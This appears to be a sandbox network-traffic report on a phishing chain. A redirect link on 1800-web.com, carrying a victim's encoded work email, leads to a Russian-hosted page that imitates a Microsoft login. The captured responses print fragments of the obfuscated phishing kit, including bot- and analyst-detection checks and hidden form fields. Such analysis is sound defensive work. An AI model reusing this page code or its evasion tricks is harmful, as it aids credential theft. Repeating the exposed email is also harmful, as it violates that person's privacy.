                                                                Jan 10, 2025 22:29:20.175354004 CET1.1.1.1192.168.2.80x670dNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 10, 2025 22:29:20.175354004 CET1.1.1.1192.168.2.80x670dNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 22:29:20.176189899 CET1.1.1.1192.168.2.80x6ca3No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 10, 2025 22:29:20.176189899 CET1.1.1.1192.168.2.80x6ca3No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 10, 2025 22:29:35.411454916 CET1.1.1.1192.168.2.80xb64dNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 10, 2025 22:29:35.411880016 CET1.1.1.1192.168.2.80x69ddNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 10, 2025 22:30:04.350739002 CET1.1.1.1192.168.2.80xfbc1No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 10, 2025 22:30:04.352572918 CET1.1.1.1192.168.2.80xf4fNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                • 1800-web.com
                                                                • https:
                                                                  • a89.softevol.ru
                                                                  • code.jquery.com
                                                                  • challenges.cloudflare.com
                                                                  • cdnjs.cloudflare.com
                                                                  • itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru
                                                                • a.nel.cloudflare.com
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.849716124.217.248.8801668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 10, 2025 22:29:42.539068937 CET6OUTData Raw: 00
                                                                Data Ascii:


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.849717124.217.248.8801668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 10, 2025 22:29:42.545506954 CET6OUTData Raw: 00
                                                                Data Ascii:


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.849718124.217.248.84431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:28:58 UTC730OUTGET /new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ= HTTP/1.1
                                                                Host: 1800-web.com
                                                                Connection: keep-alive
                                                                Upgrade-Insecure-Requests: 1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-User: ?1
                                                                Sec-Fetch-Dest: document
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:28:59 UTC218INHTTP/1.1 200 OK
                                                                Date: Fri, 10 Jan 2025 21:28:58 GMT
                                                                Server: Apache
                                                                refresh: 0;url=https://A89.softevol.ru/5fsy/#Xleon.graves@atos.net
                                                                Content-Length: 0
                                                                Connection: close
                                                                Content-Type: text/html; charset=UTF-8


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.849719124.217.248.84431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:00 UTC655OUTGET /favicon.ico HTTP/1.1
                                                                Host: 1800-web.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ=
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:00 UTC164INHTTP/1.1 404 Not Found
                                                                Date: Fri, 10 Jan 2025 21:29:00 GMT
                                                                Server: Apache
                                                                Content-Length: 315
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                2025-01-10 21:29:00 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.849723172.67.147.104431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:00 UTC681OUTGET /5fsy/ HTTP/1.1
                                                                Host: a89.softevol.ru
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Upgrade-Insecure-Requests: 1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-Dest: document
                                                                Referer: https://1800-web.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:01 UTC1242INHTTP/1.1 200 OK
                                                                Date: Fri, 10 Jan 2025 21:29:01 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Cache-Control: no-cache, private
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wz10hanb1uEugsG8fnyDHyCQ5BeddnKVwWKQGg3kZQKX6LWt3r3N%2FV9MES%2FFst55joT7dfDgj3xSABg0V%2B01aMcOcKRxZZc3MKvxnY0fM7hoxwtz1src2tsFkAqG6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=5280&min_rtt=5185&rtt_var=2012&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1586&delivery_rate=549276&cwnd=251&unsent_bytes=0&cid=d6e1e0bdd13d542c&ts=116&x=0"
                                                                Set-Cookie: XSRF-TOKEN=eyJpdiI6IkZoVUJMbndxd1M4REQ1a25lYXloR0E9PSIsInZhbHVlIjoiMTEzRW1jbWF1NjI1TjhzZWFhTkJzSi9xckhNbzBTQkRxUjRvQTNiM3lkaE1MWmwrRWlzQXZJUFFvSk9sT0hnMXFKbzQycEcvMHNNbmRsZU5sVXVXZGlDcGU0ZUVDN204QUFPMnhCVnZmSlpnSEhvSjZCM2JRb09GTTZBdkdJNWQiLCJtYWMiOiI2ODEzOGQzMmQ2MGQzNThiM2E2YTc0MjZjYzVkOWI0YzFhM2UzYjUwNDRjZjA0MjU4YTY3MjQ1YmEzZDBiMTVhIiwidGFnIjoiIn0%3D; expires=Fri, 10-Jan-2025 23:29:00 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                2025-01-10 21:29:01 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 6c 55 54 7a 4d 33 54 57 35 36 64 6a 52 68 4e 45 46 53 4b 30 52 52 63 48 5a 4d 54 55 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 57 54 68 69 4d 46 68 47 62 47 70 4a 51 6c 56 51 65 45 74 5a 4d 55 78 55 65 48 4e 49 65 45 35 56 53 45 35 46 52 57 74 72 53 57 70 7a 51 53 74 55 56 30 4e 74 5a 48 4e 32 61 32 6f 35 56 48 59 76 4d 33 42 74 65 6b 4a 46 65 6b 34 77 55 6e 42 6c 5a 44 59 35 61 55 31 6f 59 6d 46 6c 4f 56 52 6a 55 6d 78 53 62 6d 4e 61 4d 47 45 31 53 30 4e 78 65 57 46 46 62 45 5a 72 5a 6b 30 32 56 53 39 68 53 33 4a 72 4e 69 74 46 54 69 74 4e 4e 7a 5a 6f 59 6b 4a 74 61 48 68 6b 64 56 68 69 61 30 35 78 5a 58 64 78 53 32 73 31 4d 55 4d
                                                                Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImlUTzM3TW56djRhNEFSK0RRcHZMTUE9PSIsInZhbHVlIjoiWThiMFhGbGpJQlVQeEtZMUxUeHNIeE5VSE5FRWtrSWpzQStUV0NtZHN2a2o5VHYvM3BtekJFek4wUnBlZDY5aU1oYmFlOVRjUmxSbmNaMGE1S0NxeWFFbEZrZk02VS9hS3JrNitFTitNNzZoYkJtaHhkdVhia05xZXdxS2s1MUM
                                                                2025-01-10 21:29:01 UTC1369INData Raw: 39 62 39 0d 0a 3c 21 2d 2d 20 44 6f 6e 26 23 30 33 39 3b 74 20 62 65 20 64 69 73 74 72 61 63 74 65 64 20 62 79 20 63 72 69 74 69 63 69 73 6d 2e 20 52 65 6d 65 6d 62 65 72 2c 20 74 68 65 20 6f 6e 6c 79 20 74 61 73 74 65 20 6f 66 20 73 75 63 63 65 73 73 20 73 6f 6d 65 20 70 65 6f 70 6c 65 20 67 65 74 20 69 73 20 74 6f 20 74 61 6b 65 20 61 20 62 69 74 65 20 6f 75 74 20 6f 66 20 79 6f 75 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 44 6f 6e 26 23 30 33 39 3b 74 20 62 65 20 61 66 72 61 69 64 20 74 6f 20 67 69 76 65 20 75 70 20 74 68 65 20 67 6f 6f 64 20 74 6f 20 67 6f 20 66 6f 72 20 74 68 65 20 67 72 65 61 74 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 42 4f 44 6b 75 63 32 39 6d 64 47 56 32 62 32 77 75 63 6e 55
                                                                Data Ascii: 9b9... Don&#039;t be distracted by criticism. Remember, the only taste of success some people get is to take a bite out of you. --><script>/* Don&#039;t be afraid to give up the good to go for the great. */if(atob("aHR0cHM6Ly9BODkuc29mdGV2b2wucnU
                                                                2025-01-10 21:29:01 UTC1127INData Raw: 4b 49 32 52 51 55 6b 31 50 55 47 39 36 65 47 38 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 5a 46 42 53 54 55 39 51 62 33 70 34 62 79 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 32 52 51 55 6b 31 50 55 47 39 36 65 47 38 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4f 44 68 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47
                                                                Data Ascii: KI2RQUk1PUG96eG8gaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojZFBSTU9Qb3p4byBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI2RQUk1PUG96eG8uY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogODhweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dG
                                                                2025-01-10 21:29:01 UTC1369INData Raw: 63 62 65 0d 0a 5a 54 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 50 67 30 4b 49 43 41 67 49 47 6c 6d 49 43 68 75 59 58 5a 70 5a 32 46 30 62 33 49 75 64 32 56 69 5a 48 4a 70 64 6d 56 79 49 48 78 38 49 48 64 70 62 6d 52 76 64 79 35 6a 59 57 78 73 55 47 68 68 62 6e 52 76 62 53 42 38 66 43 42 33 61 57 35 6b 62 33 63 75 58 33 42 6f 59 57 35 30 62 32 30 67 66 48 77 67 62 6d 46 32 61 57 64 68 64 47 39 79 4c 6e 56 7a 5a 58 4a 42 5a 32 56 75 64 43 35 70 62 6d 4e 73 64 57 52 6c 63 79 67 69 51 6e 56 79 63 43 49 70 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62 32 4e 68 64 47 6c 76 62 69 41 39 49 43 4a 68 59 6d 39 31 64 44 70 69 62 47 46 75 61 79 49 37 44 51 70 39 44 51 70 6b 62 32 4e 31 62 57 56 75 64 43 35 68 5a 47
                                                                Data Ascii: cbeZT4NCiAgICA8c2NyaXB0Pg0KICAgIGlmIChuYXZpZ2F0b3Iud2ViZHJpdmVyIHx8IHdpbmRvdy5jYWxsUGhhbnRvbSB8fCB3aW5kb3cuX3BoYW50b20gfHwgbmF2aWdhdG9yLnVzZXJBZ2VudC5pbmNsdWRlcygiQnVycCIpKSB7DQogICAgICAgIHdpbmRvdy5sb2NhdGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZG
                                                                2025-01-10 21:29:01 UTC1369INData Raw: 62 6e 55 6e 4c 43 42 6d 64 57 35 6a 64 47 6c 76 62 69 68 6c 64 6d 56 75 64 43 6b 67 65 77 30 4b 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 63 6d 56 30 64 58 4a 75 49 47 5a 68 62 48 4e 6c 4f 77 30 4b 66 53 6b 37 44 51 70 51 56 6e 6c 44 65 48 5a 31 57 55 31 71 49 44 30 67 5a 6d 46 73 63 32 55 37 44 51 6f 6f 5a 6e 56 75 59 33 52 70 62 32 34 67 61 47 68 34 56 57 5a 56 63 47 56 59 5a 53 67 70 49 48 73 4e 43 69 41 67 49 43 42 73 5a 58 51 67 51 33 52 74 53 32 39 74 55 57 52 54 61 53 41 39 49 47 5a 68 62 48 4e 6c 4f 77 30 4b 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 45 5a 68 5a 6e 52 6b 65 45 74 77 56 31 4d 67 50 53 41 78 4d 44 41 37 44 51 6f 67 49 43 41 67 63 32 56 30 53 57 35
                                                                Data Ascii: bnUnLCBmdW5jdGlvbihldmVudCkgew0KICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgcmV0dXJuIGZhbHNlOw0KfSk7DQpQVnlDeHZ1WU1qID0gZmFsc2U7DQooZnVuY3Rpb24gaGh4VWZVcGVYZSgpIHsNCiAgICBsZXQgQ3RtS29tUWRTaSA9IGZhbHNlOw0KICAgIGNvbnN0IEZhZnRkeEtwV1MgPSAxMDA7DQogICAgc2V0SW5
                                                                2025-01-10 21:29:01 UTC531INData Raw: 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6e 42 68 5a 32 56 73 61 57 35 72 49 69 42 75 59 57 31 6c 50 53 4a 77 59 57 64 6c 62 47 6c 75 61 79 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 59 6d 78 30 5a 47 6c 77 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 61 58 41 69 49 48 5a 68 62 48 56 6c 50 53 4a 56 62 6d 74 75 62 33 64 75 49 6a 34 4e 43 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 32 59 57 78 31 5a 54 30 69 61 48 52 30 63 48 4d 36 4c 79 38 78 4f 44 41 77 4c 58 64 6c
                                                                Data Ascii: HR5cGU9ImhpZGRlbiIgaWQ9InBhZ2VsaW5rIiBuYW1lPSJwYWdlbGluayIgdmFsdWU9IiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBpZD0iYmx0ZGlwIiBuYW1lPSJibHRkaXAiIHZhbHVlPSJVbmtub3duIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkcmVmIiBuYW1lPSJibHRkcmVmIiB2YWx1ZT0iaHR0cHM6Ly8xODAwLXdl
                                                                2025-01-10 21:29:01 UTC1369INData Raw: 33 38 37 31 0d 0a 52 70 62 6d 63 67 59 6e 4a 76 64 33 4e 6c 63 69 42 32 59 57 78 70 5a 47 46 30 61 57 39 75 49 48 42 79 62 32 4e 6c 5a 48 56 79 5a 58 4d 67 5a 6d 39 79 49 48 4e 6c 59 33 56 79 61 58 52 35 4c 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 63 32 4e 79 61 58 42 30 50 67 30 4b 64 48 56 79 62 6e 4e 30 61 57 78 6c 4c 6e 4a 6c 62 6d 52 6c 63 69 67 6e 49 32 4e 6d 4a 79 77 67 65 77 30 4b 49 43 41 67 49 48 4e 70 64 47 56 72 5a 58 6b 36 49 43 63 77 65 44 52 42 51 55 46 42 51 55 46 42 4d 30 39 73 59 6b 39 54 51 56 64 68 65 57 39 70 62 57 6b 6e 4c 41 30 4b 49 43 41 67 49 43 64 6c 63 6e 4a 76 63 69 31 6a 59 57 78 73 59 6d 46
                                                                Data Ascii: 3871RpbmcgYnJvd3NlciB2YWxpZGF0aW9uIHByb2NlZHVyZXMgZm9yIHNlY3VyaXR5Lg0KPC9kaXY+DQo8L2Zvcm0+DQo8L2Rpdj4NCjwvZGl2Pg0KPC9kaXY+DQo8c2NyaXB0Pg0KdHVybnN0aWxlLnJlbmRlcignI2NmJywgew0KICAgIHNpdGVrZXk6ICcweDRBQUFBQUFBM09sYk9TQVdheW9pbWknLA0KICAgICdlcnJvci1jYWxsYmF
                                                                2025-01-10 21:29:01 UTC1369INData Raw: 69 42 79 5a 58 4e 77 62 32 35 7a 5a 53 35 71 63 32 39 75 4b 43 6b 37 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 6b 59 58 52 68 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 6f 5a 47 46 30 59 56 73 6e 63 33 52 68 64 48 56 7a 4a 31 30 67 50 54 30 67 4a 33 4e 31 59 32 4e 6c 63 33 4d 6e 4b 58 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 6f 55 46 5a 35 51 33 68 32 64 56 6c 4e 61 69 41 39 50 53 42 6d 59 57 78 7a 5a 53 6c 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 78 76 59 32 46 30 61 57 39 75 4c 6e 4a 6c 62 47 39 68 5a 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 39 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 30 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 6f 5a 47 46 30 59 56 73 6e 63 33 52 68 64 48 56 7a
                                                                Data Ascii: iByZXNwb25zZS5qc29uKCk7DQogICAgfSkudGhlbihkYXRhID0+IHsNCiAgICAgICAgaWYoZGF0YVsnc3RhdHVzJ10gPT0gJ3N1Y2Nlc3MnKXsNCiAgICAgICAgaWYoUFZ5Q3h2dVlNaiA9PSBmYWxzZSl7DQogICAgICAgIGxvY2F0aW9uLnJlbG9hZCgpOw0KICAgICAgICB9DQogICAgICAgIH0NCiAgICAgICAgaWYoZGF0YVsnc3RhdHVz
                                                                2025-01-10 21:29:01 UTC1369INData Raw: 52 79 49 65 29 7b 0d 0a 63 6f 6e 73 74 20 75 6f 6b 6f 42 72 4c 67 65 4b 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 77 5a 51 71 6a 4e 5a 69 54 4f 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 77 5a 51 71 6a 4e 5a 69 54 4f 2e 70 61 74 68 6e 61 6d 65 20 3d 20 77 5a 51 71 6a 4e 5a 69 54 4f 2e 70 61 74 68 6e 61 6d 65 2e 73 6c 69 63 65 28 30 2c 20 2d 31 29 3b 0d 0a 7d 0d 0a 63 6f 6e 73 74 20 61 6c 6c 41 56 74 73 44 6a 77 20 3d 20 77 5a 51 71 6a 4e 5a 69 54 4f 2e 70 61 74 68 6e 61 6d 65 2b 27 2f 27 3b 0d 0a 69 66 28 61 6c 6c 41 56 74 73 44 6a 77 20 3d 3d 20 75 6f 6b 6f 42
                                                                Data Ascii: RyIe){const uokoBrLgeK = window.location.pathname.split('%23')[0].split('%3F')[0];if (wZQqjNZiTO.pathname.endsWith('/')) {wZQqjNZiTO.pathname = wZQqjNZiTO.pathname.slice(0, -1);}const allAVtsDjw = wZQqjNZiTO.pathname+'/';if(allAVtsDjw == uokoB
                                                                2025-01-10 21:29:01 UTC1369INData Raw: 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 5a 46 42 53 54 55 39 51 62 33 70 34 62 79 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 32 52 51 55 6b 31 50 55 47 39 36 65 47 38 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4f 44 68 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63
                                                                Data Ascii: R7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojZFBSTU9Qb3p4byBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI2RQUk1PUG96eG8uY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogODhweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7c


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.849724151.101.194.1374431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:01 UTC621OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                Host: code.jquery.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: script
                                                                Referer: https://a89.softevol.ru/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:01 UTC611INHTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 89501
                                                                Server: nginx
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                ETag: "28feccc0-15d9d"
                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Via: 1.1 varnish, 1.1 varnish
                                                                Accept-Ranges: bytes
                                                                Age: 2029068
                                                                Date: Fri, 10 Jan 2025 21:29:01 GMT
                                                                X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890025-NYC
                                                                X-Cache: HIT, HIT
                                                                X-Cache-Hits: 55, 0
                                                                X-Timer: S1736544542.743740,VS0,VE1
                                                                Vary: Accept-Encoding
                                                                2025-01-10 21:29:01 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
